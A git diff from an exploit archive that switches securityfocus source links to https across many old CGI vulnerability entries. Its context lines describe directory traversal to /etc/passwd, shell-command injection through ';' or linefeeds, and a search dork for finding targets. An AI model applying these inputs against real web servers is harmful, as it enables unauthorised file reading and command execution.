user-specified files to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (eg "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise. diff --git a/exploits/cgi/remote/20370.txt b/exploits/cgi/remote/20370.txt index 0924c304d..59dbf7a60 100644 --- a/exploits/cgi/remote/20370.txt +++ b/exploits/cgi/remote/20370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1883/info +source: https://www.securityfocus.com/bid/1883/info whois is a utility used to find general information and technical details about registered domain names. A vulnerability exists in Kootenay Web Inc's Whois (release v.1.9), a web interface to whois running on a linux server. diff --git a/exploits/cgi/remote/20387.txt b/exploits/cgi/remote/20387.txt index 5c811a1b5..ae4c3d0d0 100644 --- a/exploits/cgi/remote/20387.txt +++ b/exploits/cgi/remote/20387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1921/info +source: https://www.securityfocus.com/bid/1921/info YaBB (Yet Another Bulletin Board) is a popular perl-based bulletin board scripting package. diff --git a/exploits/cgi/remote/20397.txt b/exploits/cgi/remote/20397.txt index da4debd90..7ad6727bd 100644 --- a/exploits/cgi/remote/20397.txt +++ b/exploits/cgi/remote/20397.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1932/info +source : https://www.securityfocus.com/bid/1932/info Cart32 is a shopping cart application for e-commerce enabled sites. diff --git a/exploits/cgi/remote/20405.pl b/exploits/cgi/remote/20405.pl index 62609ae33..25ce506f2 100755 --- a/exploits/cgi/remote/20405.pl +++ b/exploits/cgi/remote/20405.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/1951/info +# source: https://www.securityfocus.com/bid/1951/info # # DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums. # diff --git a/exploits/cgi/remote/20408.txt b/exploits/cgi/remote/20408.txt index ac7f9f9c6..e4b8e7749 100644 --- a/exploits/cgi/remote/20408.txt +++ b/exploits/cgi/remote/20408.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1963/info +source : https://www.securityfocus.com/bid/1963/info CGIForum is a commercial cgi script from Markus Triska which is designed to facilitate web-based threaded discussion forums. diff --git a/exploits/cgi/remote/20423.txt b/exploits/cgi/remote/20423.txt index 96f868c85..a66eed5f3 100644 --- a/exploits/cgi/remote/20423.txt +++ b/exploits/cgi/remote/20423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1975/info +source: https://www.securityfocus.com/bid/1975/info Campas is a sample CGI script shipped with some older versions of NCSA HTTPd, an obsolete web server package. The versions that included the script could not be determined as the server is no longer maintained, but version 1.2 of the script itself is known to be vulnerable. The script fails to properly filter user supplied variables, and as a result can be used to execute commands on the host with the privileges of the web server. Commands can be passed as a variable to the script, separated by %0a (linefeed) characters. See exploit for example. Successful exploitation of this vulnerability could be used to deface the web site, read any files the server process has access to, get directory listings, and execute anything else the web server has access to. diff --git a/exploits/cgi/remote/20430.txt b/exploits/cgi/remote/20430.txt index 66758259b..f486b5c13 100644 --- a/exploits/cgi/remote/20430.txt +++ b/exploits/cgi/remote/20430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1995/info +source: https://www.securityfocus.com/bid/1995/info The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful exploitation involve anything the web server process has permissions to do, including possibly web site defacement. diff --git a/exploits/cgi/remote/20433.txt b/exploits/cgi/remote/20433.txt index 241d69a8d..d4543fdcc 100644 --- a/exploits/cgi/remote/20433.txt +++ b/exploits/cgi/remote/20433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2000/info +source: https://www.securityfocus.com/bid/2000/info Whois scripts provide InterNIC lookup services via HTTP. The vulnerable scripts include versions of Matt's Whois and CGI City Whois. Older versions of these fail to filter metacharacters, allowing execution of arbitrary commands by embedding the commands in the domain name to lookup. Specifically, the UNIX command separation character ";" can be used to execute commands. Successful exploitation of this vulnerability would allow an attacker to execute commands with the privileges of the web server process, which could result in retrieval of sensitive information, web defacements, etc. diff --git a/exploits/cgi/remote/20434.txt b/exploits/cgi/remote/20434.txt index 49b61ec70..008b33eec 100644 --- a/exploits/cgi/remote/20434.txt +++ b/exploits/cgi/remote/20434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2001/info +source: https://www.securityfocus.com/bid/2001/info Miva's htmlscript CGI program provides a unique scripting language with HTML type tags. (Note that htmlscript is an older product no longer distributed by Miva under that name.) Versions of the htmlscript interpreter (a CGI script) prior to 2.9932 are vulnerable to a file reading directory traversal attack using relative paths (eg., "../../../../../../etc/passwd"). An attacker need only append this path as a variable passed to the script via a URL. The contents of any file to which the web server process has read access can be retrieved using this method. diff --git a/exploits/cgi/remote/20435.txt b/exploits/cgi/remote/20435.txt index 75296d7e0..3f692268d 100644 --- a/exploits/cgi/remote/20435.txt +++ b/exploits/cgi/remote/20435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2003/info +source: https://www.securityfocus.com/bid/2003/info NCSA HTTPd and comes with a CGI sample shell script, test-cgi, located by default in /cgi-bin. This script does not properly enclose an "ECHO" command in quotes, and as a result "shell expansion" of the * character can occur under some configurations. This allows a remote attacker to obtain file listings, by passing *, /*, /usr/* etc., as variables. The ECHO command expands the * to give a directory listing of the specified directory. This could be used to gain information to facilitate future attacks. This is identical to a problem with another sample script, nph-test-cgi. See references. diff --git a/exploits/cgi/remote/20442.html b/exploits/cgi/remote/20442.html index f3633d1cf..3c5571ccb 100644 --- a/exploits/cgi/remote/20442.html +++ b/exploits/cgi/remote/20442.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2019/info +source: https://www.securityfocus.com/bid/2019/info Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to execute any command on the host machine, with the privileges of the web server. If the attacker can submit a command to run as a hidden variable that command will be executed. Normally this variable is reserved for the mail program and is accessed from an HTML page with the following piece of code: diff --git a/exploits/cgi/remote/20444.txt b/exploits/cgi/remote/20444.txt index 542449a78..83b1473a4 100644 --- a/exploits/cgi/remote/20444.txt +++ b/exploits/cgi/remote/20444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2020/info +source: https://www.securityfocus.com/bid/2020/info Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to read files on the host machine, with the privileges of the web server. This can be accomplished by embedding the input redirection metacharacter along with a filename into the form field used for e-mail address entry (). Any file that the web server process has read access to can be retrieved. diff --git a/exploits/cgi/remote/20446.txt b/exploits/cgi/remote/20446.txt index 047af7306..8cdc09fda 100644 --- a/exploits/cgi/remote/20446.txt +++ b/exploits/cgi/remote/20446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2024/info +source: https://www.securityfocus.com/bid/2024/info The freeware guestbook package from freeware.webcom.se provides a web-based guestbook feature, using CGI. Some versions of this guestbook (undetermined at the time of writing) are vulnerable to an attack allowing an intruder to retrieve the contents of arbitrary files to which the web server has access. This can be accomplished by specifying the path and filename as the parameter "template" to either rguest.exe or wguest.exe - see Exploit for example. These two programs typically reside in /cgi-bin. diff --git a/exploits/cgi/remote/20447.txt b/exploits/cgi/remote/20447.txt index 3b8dbc486..7039993e0 100644 --- a/exploits/cgi/remote/20447.txt +++ b/exploits/cgi/remote/20447.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2024/info +source: https://www.securityfocus.com/bid/2024/info The freeware guestbook package from freeware.webcom.se provides a web-based guestbook feature, using CGI. Some versions of this guestbook (undetermined at the time of writing) are vulnerable to an attack allowing an intruder to retrieve the contents of arbitrary files to which the web server has access. This can be accomplished by specifying the path and filename as the parameter "template" to either rguest.exe or wguest.exe - see Exploit for example. These two programs typically reside in /cgi-bin. diff --git a/exploits/cgi/remote/20448.txt b/exploits/cgi/remote/20448.txt index 0d7219377..2dd5513ce 100644 --- a/exploits/cgi/remote/20448.txt +++ b/exploits/cgi/remote/20448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2025/info +source: https://www.securityfocus.com/bid/2025/info Novell NetWare Web Server 2.x versions came with a CGI written in BASIC called convert.bas. This script allows retrieval of files outside of the normal web server context. This can be accomplished simply by submitting the filename and path as a parameter to the script, using relative paths (../../) to traverse directories. Access may or may not be limited to the SYS: volume. diff --git a/exploits/cgi/remote/20463.txt b/exploits/cgi/remote/20463.txt index 585688dd5..95bb6483b 100644 --- a/exploits/cgi/remote/20463.txt +++ b/exploits/cgi/remote/20463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2058/info +source: https://www.securityfocus.com/bid/2058/info WEBgais is a script that provides a web interface to the "gais" (Global Area Intelligent Search) search engine tool. All versions up to 1.0B2 are vulnerable. The vulnerable script is /cgi-bin/webgais: due to improper input checking it allows a remote attacker to execute commands at the privilege level of the web server. A specifically formatted query allows the vulnerable code to be executed; this query must include the parameters output=subject and domain=paragraph. These two parameters must be included, otherwise the vulnerable code is not executed. The problem lies in an improperly protected Perl "system" command that can be circumvented by encapsulating the malicious command in single quotes and using the unix shell command separation metacharacter ";". See exploit for an example. diff --git a/exploits/cgi/remote/20465.sh b/exploits/cgi/remote/20465.sh index d684f7e76..9698b9088 100755 --- a/exploits/cgi/remote/20465.sh +++ b/exploits/cgi/remote/20465.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2059/info +source: https://www.securityfocus.com/bid/2059/info The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port, which it then tries to connect to. If a webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established. diff --git a/exploits/cgi/remote/20483.txt b/exploits/cgi/remote/20483.txt index 4cf86827c..ffce98e2e 100644 --- a/exploits/cgi/remote/20483.txt +++ b/exploits/cgi/remote/20483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2077/info +source: https://www.securityfocus.com/bid/2077/info WEBgais is a package that provides a web interface to the "gais" (Global Area Intelligent Search) search engine tool. This package contains a vulnerable script, websendmail, which can be used to execute arbitrary commands on the server with the privileges of the web server. User supplied data (from the "receiver=" form variable) is passed to a Perl OPEN function without proper input verification, allowing the use of shell metacharacters to separate commands. This can be directly exploited by submitting via the POST method the variable "receiver=" with the command separation shell metacharacter (;) followed by a command. Consequences could range from destruction of data and web site defacement to elevation of privileges through locally exploitable vulnerabilities. diff --git a/exploits/cgi/remote/20497.html b/exploits/cgi/remote/20497.html index 0dced463f..4f7a8a9f7 100644 --- a/exploits/cgi/remote/20497.html +++ b/exploits/cgi/remote/20497.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2101/info +source: https://www.securityfocus.com/bid/2101/info An input validation vulnerability exists in Leif M. Wright's everything.cgi, a Perl-based form design tool. diff --git a/exploits/cgi/remote/20503.html b/exploits/cgi/remote/20503.html index a2bc98c60..d8b88d783 100644 --- a/exploits/cgi/remote/20503.html +++ b/exploits/cgi/remote/20503.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2102/info +source: https://www.securityfocus.com/bid/2102/info A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms. diff --git a/exploits/cgi/remote/20504.html b/exploits/cgi/remote/20504.html index 3665621a2..f2d59d578 100644 --- a/exploits/cgi/remote/20504.html +++ b/exploits/cgi/remote/20504.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2103/info +source: https://www.securityfocus.com/bid/2103/info ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources. diff --git a/exploits/cgi/remote/20506.html b/exploits/cgi/remote/20506.html index 19a12375d..f2c0bc0cb 100644 --- a/exploits/cgi/remote/20506.html +++ b/exploits/cgi/remote/20506.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2106/info +source: https://www.securityfocus.com/bid/2106/info A vulnerabiliy exists in Leif M. Wright's simplestguest.cgi, a script designed to coordinate guestbook submissions from website visitors. diff --git a/exploits/cgi/remote/20522.txt b/exploits/cgi/remote/20522.txt index 3101e5bca..e283b1a9a 100644 --- a/exploits/cgi/remote/20522.txt +++ b/exploits/cgi/remote/20522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2155/info +source: https://www.securityfocus.com/bid/2155/info Technote Inc. offers a Multicommunication Package which includes a web board type of service. diff --git a/exploits/cgi/remote/20523.pl b/exploits/cgi/remote/20523.pl index 8ecd9b782..07d293378 100755 --- a/exploits/cgi/remote/20523.pl +++ b/exploits/cgi/remote/20523.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2156/info +source: https://www.securityfocus.com/bid/2156/info Technote Inc. offers a multi-communication Package that includes a web board type of service. @@ -181,7 +181,7 @@ print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\n Technote Inc. from Korea Command Excution Command Execution Vulnerability by SPABAM 2004" ; -print "\n http://www.securityfocus.com/bid/2156 +print "\n https://www.securityfocus.com/bid/2156 "; print "\n Technote Exploit v1.2"; print "\n \n sugg.. google it: allinurl:technote/main.cgi*filename=*"; diff --git a/exploits/cgi/remote/20524.txt b/exploits/cgi/remote/20524.txt index f2de56b58..b713a0a43 100644 --- a/exploits/cgi/remote/20524.txt +++ b/exploits/cgi/remote/20524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2159/info +source: https://www.securityfocus.com/bid/2159/info An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors. diff --git a/exploits/cgi/remote/20525.txt b/exploits/cgi/remote/20525.txt index 8b0579aa2..3825272ff 100644 --- a/exploits/cgi/remote/20525.txt +++ b/exploits/cgi/remote/20525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2160/info +source: https://www.securityfocus.com/bid/2160/info An input validation vulnerability exists in Brian Stanback's bslist.cgi, a script designed to coordinate mailing lists. diff --git a/exploits/cgi/remote/20527.txt b/exploits/cgi/remote/20527.txt index 0520087bc..0611684c1 100644 --- a/exploits/cgi/remote/20527.txt +++ b/exploits/cgi/remote/20527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2166/info +source: https://www.securityfocus.com/bid/2166/info Informix Webdriver, the web-to-DB interface used by Informix database products, may permit unauthorized remote access to the system's administration functions. diff --git a/exploits/cgi/remote/20533.txt b/exploits/cgi/remote/20533.txt index 1d7a8c3b0..63a915615 100644 --- a/exploits/cgi/remote/20533.txt +++ b/exploits/cgi/remote/20533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2177/info +source: https://www.securityfocus.com/bid/2177/info bbs_forum.cgi is a popular Perl cgi script from eXtropia.com. It supports the creation and maintenance of web-based threaded discussion forums. diff --git a/exploits/cgi/remote/20567.txt b/exploits/cgi/remote/20567.txt index 22536f889..90fc9c925 100644 --- a/exploits/cgi/remote/20567.txt +++ b/exploits/cgi/remote/20567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2250/info +source: https://www.securityfocus.com/bid/2250/info PHP/FI is an software suite designed to offer enhanced features to sites served via the World Wide Web. It is open source, freely available, and maintained by the PHP development team. diff --git a/exploits/cgi/remote/20570.txt b/exploits/cgi/remote/20570.txt index 65092ad8f..36fb25ce0 100644 --- a/exploits/cgi/remote/20570.txt +++ b/exploits/cgi/remote/20570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2255/info +source: https://www.securityfocus.com/bid/2255/info 'dumpenv.pl' is a utility that will display environment information on which the server resides, this information could include the server software version being used, directory settings and path information. diff --git a/exploits/cgi/remote/20583.pl b/exploits/cgi/remote/20583.pl index 4cf1b9da7..042e5f965 100755 --- a/exploits/cgi/remote/20583.pl +++ b/exploits/cgi/remote/20583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2265/info +source: https://www.securityfocus.com/bid/2265/info textcounter.pl is distributed through Matt's Scripts archive, and provides added features to httpd servers such as counters, guestbooks, and http cookie management. Due to insufficient checking of entered characters, it is possible for a remote user to input custom formatted strings into the $DOCUMENT_URI environment variable which, which when parsed can be executed as the UID of the httpd process. This makes it possible for a user with malicious intentions to execute arbitrary commands, and potentially gain access to the local host. diff --git a/exploits/cgi/remote/20606.pl b/exploits/cgi/remote/20606.pl index 4c532661e..f40a84141 100755 --- a/exploits/cgi/remote/20606.pl +++ b/exploits/cgi/remote/20606.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2329/info +source: https://www.securityfocus.com/bid/2329/info Improperly validated user-supplied input to the Content-Type header can create an overflow condition. diff --git a/exploits/cgi/remote/20609.txt b/exploits/cgi/remote/20609.txt index 9ce5a5e59..95bb13904 100644 --- a/exploits/cgi/remote/20609.txt +++ b/exploits/cgi/remote/20609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2336/info +source: https://www.securityfocus.com/bid/2336/info Requesting a specially crafted URL will make it possible for a remote attacker to disclose the physical path to the web root and peruse the entire directory listing. diff --git a/exploits/cgi/remote/20611.txt b/exploits/cgi/remote/20611.txt index 0a82ba342..8d77b7f8b 100644 --- a/exploits/cgi/remote/20611.txt +++ b/exploits/cgi/remote/20611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2338/info +source: https://www.securityfocus.com/bid/2338/info A vulnerability exists in Anaconda Foundation Directory which allows a remote user to traverse the filesystem of a target computer. This may lead to the disclosure of file and directory contents. diff --git a/exploits/cgi/remote/20623.txt b/exploits/cgi/remote/20623.txt index 173a9804f..c23d4b4d6 100644 --- a/exploits/cgi/remote/20623.txt +++ b/exploits/cgi/remote/20623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2361/info +source: https://www.securityfocus.com/bid/2361/info It is possible for a remote user to gain read access to directories and files outside the root directory of Carey Internet Services Commerce.cgi. Requesting a specially crafted URL composed of '/../%00' along with the known filename or directory will disclose the requested resource. diff --git a/exploits/cgi/remote/20629.txt b/exploits/cgi/remote/20629.txt index 859cd2fe0..fba5fd737 100644 --- a/exploits/cgi/remote/20629.txt +++ b/exploits/cgi/remote/20629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2370/info +source: https://www.securityfocus.com/bid/2370/info A remote user could gain read access to known files outside of the root directory where Way-Board resides. Requesting a specially crafted URL composed of '%00' sequences along with the known filename will disclose the requested file. diff --git a/exploits/cgi/remote/20630.txt b/exploits/cgi/remote/20630.txt index 0d32d49f4..41d3c059f 100644 --- a/exploits/cgi/remote/20630.txt +++ b/exploits/cgi/remote/20630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2371/info +source: https://www.securityfocus.com/bid/2371/info A remote user could gain read access to known files outside of the root directory where Martin Hamilton ROADS resides. Requesting a specially crafted URL composed of '%00' sequences along with the known filename will disclose the requested file. diff --git a/exploits/cgi/remote/20631.txt b/exploits/cgi/remote/20631.txt index bcc5436bd..58f9880b6 100644 --- a/exploits/cgi/remote/20631.txt +++ b/exploits/cgi/remote/20631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2372/info +source: https://www.securityfocus.com/bid/2372/info A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. diff --git a/exploits/cgi/remote/20632.txt b/exploits/cgi/remote/20632.txt index 5b2065e1a..6b626e6cb 100644 --- a/exploits/cgi/remote/20632.txt +++ b/exploits/cgi/remote/20632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2372/info +source: https://www.securityfocus.com/bid/2372/info A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. diff --git a/exploits/cgi/remote/20633.txt b/exploits/cgi/remote/20633.txt index e6a30b3d2..b25f91d83 100644 --- a/exploits/cgi/remote/20633.txt +++ b/exploits/cgi/remote/20633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2374/info +source: https://www.securityfocus.com/bid/2374/info Making an invalid request to a machine running Brightstation Muscat, will disclose the physical path to the root directory. diff --git a/exploits/cgi/remote/20642.pl b/exploits/cgi/remote/20642.pl index 2cc3befd3..747327959 100755 --- a/exploits/cgi/remote/20642.pl +++ b/exploits/cgi/remote/20642.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2393/info +source: https://www.securityfocus.com/bid/2393/info Adcycle is a package of perl scripts available from Adcycle.com. The scripts are designed to manage banner ad rotation through a web interface, backended with a MySQL database. diff --git a/exploits/cgi/remote/20683.txt b/exploits/cgi/remote/20683.txt index 5606a333b..1d24cbc3e 100644 --- a/exploits/cgi/remote/20683.txt +++ b/exploits/cgi/remote/20683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2471/info +source: https://www.securityfocus.com/bid/2471/info Ikonboard is a perl-based discussion forum script from ikonboard.com. diff --git a/exploits/cgi/remote/20686.txt b/exploits/cgi/remote/20686.txt index ce857193a..9f855d791 100644 --- a/exploits/cgi/remote/20686.txt +++ b/exploits/cgi/remote/20686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2484/info +source: https://www.securityfocus.com/bid/2484/info A vulnerability exists in a CGI script called "The Free Online Dictionary of Computing". diff --git a/exploits/cgi/remote/20689.pl b/exploits/cgi/remote/20689.pl index 1ace20c08..734afc99f 100755 --- a/exploits/cgi/remote/20689.pl +++ b/exploits/cgi/remote/20689.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2492/info +source: https://www.securityfocus.com/bid/2492/info A buffer overflow in ASPSeek versions 1.0.0 through to 1.0.3 allows for arbitrary code execution with the privileges of the web server. The vulnerable script is s.cgi and the buffer overflow can be accessed by submitting an excessively long query string to the script (the variable tmpl, specifically). diff --git a/exploits/cgi/remote/20714.txt b/exploits/cgi/remote/20714.txt index bd01c8322..f200ee758 100644 --- a/exploits/cgi/remote/20714.txt +++ b/exploits/cgi/remote/20714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2512/info +source: https://www.securityfocus.com/bid/2512/info Clipper is a headline-gathering tool from Anaconda! Partners which, in certain versions, is vulnerable to directory traversal attacks. diff --git a/exploits/cgi/remote/20725.txt b/exploits/cgi/remote/20725.txt index 9f6b052c1..a2378e797 100644 --- a/exploits/cgi/remote/20725.txt +++ b/exploits/cgi/remote/20725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2536/info +source: https://www.securityfocus.com/bid/2536/info A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies. diff --git a/exploits/cgi/remote/20744.pl b/exploits/cgi/remote/20744.pl index 455f04632..9a3782ce4 100755 --- a/exploits/cgi/remote/20744.pl +++ b/exploits/cgi/remote/20744.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2563/info +source: https://www.securityfocus.com/bid/2563/info nph-maillist is a Perl CGI script that handles mailing lists, typically used to notify interested users of site updates. A hostile user can enter commands embedded in an email address via the subscription form, and then force a mailing which will execute the commands. diff --git a/exploits/cgi/remote/20752.txt b/exploits/cgi/remote/20752.txt index cfffaeeb3..76e1c2947 100644 --- a/exploits/cgi/remote/20752.txt +++ b/exploits/cgi/remote/20752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2584/info +source: https://www.securityfocus.com/bid/2584/info The NCM Content Management System is a product distributed by NCM. The NCM Content Management System is designed to manage web material and other data, and provide an interface to databases from web resources. diff --git a/exploits/cgi/remote/20780.c b/exploits/cgi/remote/20780.c index 848441057..5e50dfc12 100644 --- a/exploits/cgi/remote/20780.c +++ b/exploits/cgi/remote/20780.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2628/info +// source: https://www.securityfocus.com/bid/2628/info CrossWind CyberScheduler is a scheduling and calendaring package. It consists of two distinct parts for - a set of cgi scripts on a web server and a set of daemons (or services) on a database server. Both parts are available for Windows NT, Linux and a range of UNIX platforms including Solaris. diff --git a/exploits/cgi/remote/20799.c b/exploits/cgi/remote/20799.c index a01198f97..6316a9f45 100644 --- a/exploits/cgi/remote/20799.c +++ b/exploits/cgi/remote/20799.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2653/info +// source: https://www.securityfocus.com/bid/2653/info PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to. diff --git a/exploits/cgi/remote/20800.c b/exploits/cgi/remote/20800.c index 827159dea..e66bfd788 100644 --- a/exploits/cgi/remote/20800.c +++ b/exploits/cgi/remote/20800.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2653/info +// source: https://www.securityfocus.com/bid/2653/info PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to. diff --git a/exploits/cgi/remote/20801.c b/exploits/cgi/remote/20801.c index bb7015dde..225810660 100644 --- a/exploits/cgi/remote/20801.c +++ b/exploits/cgi/remote/20801.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2653/info +// source: https://www.securityfocus.com/bid/2653/info PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to. diff --git a/exploits/cgi/remote/20808.txt b/exploits/cgi/remote/20808.txt index 56b5d2fa7..1251226bd 100644 --- a/exploits/cgi/remote/20808.txt +++ b/exploits/cgi/remote/20808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2663/info +source: https://www.securityfocus.com/bid/2663/info PerlCal is a CGI script written by Acme Software that allows web-based calendar sharing and related functions. diff --git a/exploits/cgi/remote/20809.html b/exploits/cgi/remote/20809.html index 106106dc5..9edb231ba 100644 --- a/exploits/cgi/remote/20809.html +++ b/exploits/cgi/remote/20809.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2665/info +source: https://www.securityfocus.com/bid/2665/info Excite for Web Servers 1.1 (EWS) is a search engine suite for web servers running under Windows NT and UNIX. By default the file containing the administrative password, architext.conf, is world readable and world writable. This allows an attacker with local access to gain administrative privileges over EWS. This password is encrypted, but the attacker can bypass the normal login method and pass the encrypted password directly to the script responsible for authenticating the user - /cgi-bin/AT-generate.cgi. This can be done with the help of a simple HTML form or passed directly to the script as the "ENCRYPTEDPASS" parameter. Since the file is also world writable, the attacker could make up an "encrypted" password and overwrite the file with it, then submit the new encrypted password. diff --git a/exploits/cgi/remote/20831.txt b/exploits/cgi/remote/20831.txt index 4ab3ee1f7..42d78012d 100644 --- a/exploits/cgi/remote/20831.txt +++ b/exploits/cgi/remote/20831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2705/info +source: https://www.securityfocus.com/bid/2705/info A1Stats is a CGI product by Drummon Miles used to report on a website's visitor traffic. diff --git a/exploits/cgi/remote/20832.txt b/exploits/cgi/remote/20832.txt index 3235dfe3f..76af29818 100644 --- a/exploits/cgi/remote/20832.txt +++ b/exploits/cgi/remote/20832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2705/info +source: https://www.securityfocus.com/bid/2705/info A1Stats is a CGI product by Drummon Miles used to report on a website's visitor traffic. diff --git a/exploits/cgi/remote/20833.txt b/exploits/cgi/remote/20833.txt index 7f66150bf..15bfbcd3e 100644 --- a/exploits/cgi/remote/20833.txt +++ b/exploits/cgi/remote/20833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2705/info +source: https://www.securityfocus.com/bid/2705/info A1Stats is a CGI product by Drummon Miles used to report on a website's visitor traffic. diff --git a/exploits/cgi/remote/20849.pl b/exploits/cgi/remote/20849.pl index 67df3121d..385c68341 100755 --- a/exploits/cgi/remote/20849.pl +++ b/exploits/cgi/remote/20849.pl @@ -1,4 +1,4 @@ 